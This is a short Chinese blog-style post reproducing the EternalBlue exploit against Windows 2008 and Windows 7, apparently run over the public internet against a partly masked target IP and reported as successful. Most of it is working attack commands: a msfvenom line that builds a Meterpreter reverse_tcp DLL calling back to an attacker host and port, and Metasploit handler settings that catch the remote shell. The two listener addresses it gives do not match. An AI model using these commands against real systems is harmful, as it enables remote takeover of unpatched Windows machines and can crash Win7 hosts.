方程式漏洞之复现window2008/win7 远程命令执行漏洞

前几天就想写的，因为一些缘故就没写。此次是在外网环境下进行的。大家在内网中也一个样。

方法：

　　使用Eternalblue模块，剑测是否有漏洞然后msf生成一个dll直接反弹shell.

PS：win版本的不知道缘何生成出来的dll是0kb 我就在自己本地的虚拟机生成了一个dll。生成dll命令

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=6566 -f dll > /opt/xishaonian.dll

然后copy到了自己的测试机。

测试机IP：118.244.x.x

被攻击者IP：119.29.x.x

MSF监听命令：

use exploit/multi/handler

set LHOST 192.168.1.109

set LPORT 6566

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

成功。

 

在测试当中，发现win7的会被蓝屏，而08的却不会